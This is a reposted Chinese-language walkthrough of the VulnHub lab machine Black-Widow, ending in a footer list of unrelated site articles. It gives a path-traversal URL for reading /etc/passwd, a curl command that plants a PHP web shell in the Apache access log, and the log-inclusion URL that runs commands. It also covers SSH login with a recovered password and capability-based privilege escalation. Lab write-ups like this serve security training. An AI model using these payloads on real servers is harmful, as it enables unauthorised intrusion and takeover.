vulnhub靶场:Black-Widow-final
1.信息收集
探测存活主机,发现192.168.239.177存活
对目标主机192.168.239.177进行端口扫描,发现存活22、80、111、2049、3128等端口
在浏览器中访问http://192.168.239.177,并查看源码,未发现有用的信息
对http://192.168.239.177进行目录扫描,发现/company目录
查看源码发现有参数file,存在文件读取漏洞,但没有反应
对http://192.168.239.177/company继续进行目录扫描,发现存在/started.php
在浏览器中输入http://192.168.239.177/company/started.php?file=../../../../../../../../../../../../../etc/passwd
,读取成功
2.漏洞利用
看到搭建的第三方插件为apache,并且有文件读取漏洞,想到将一句话木马写入到日志中,并利用文件读取漏洞进行getshell。
先探测日志的路径为/var/log/apache2/access.log。
之后将木马以User-agent的写入access.log之中,输入 curl -A '<?php system($_GET[shell]);?>' http://192.168.239.177
,
在浏览器中输入:http://192.168.239.177/company/started.php?file=…/…/…/…/…/…/…/…/…/…/…/…/…/var/log/apache2/access.log&shell=id,执行命令成功
反弹shell
3.提权
查看发先在/var/baclups中,存在auth.log日志文件,auth.log日志文件是用户登录及身份认证日志,可能存在用户名的密码。
查看日志发现用户名密码可能是?V1p3r2020!?。
尝试ssh登录成功。
上传linpeas.sh进行提权信息收集。
查看123.txt发现存在capabilities提权
使用capabilities提权为root权限
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhgaejij
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
怎样阻止微信小程序自动打开
PHP中文网 06-13 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
photoshop蒙版画笔没反应怎么办
PHP中文网 06-24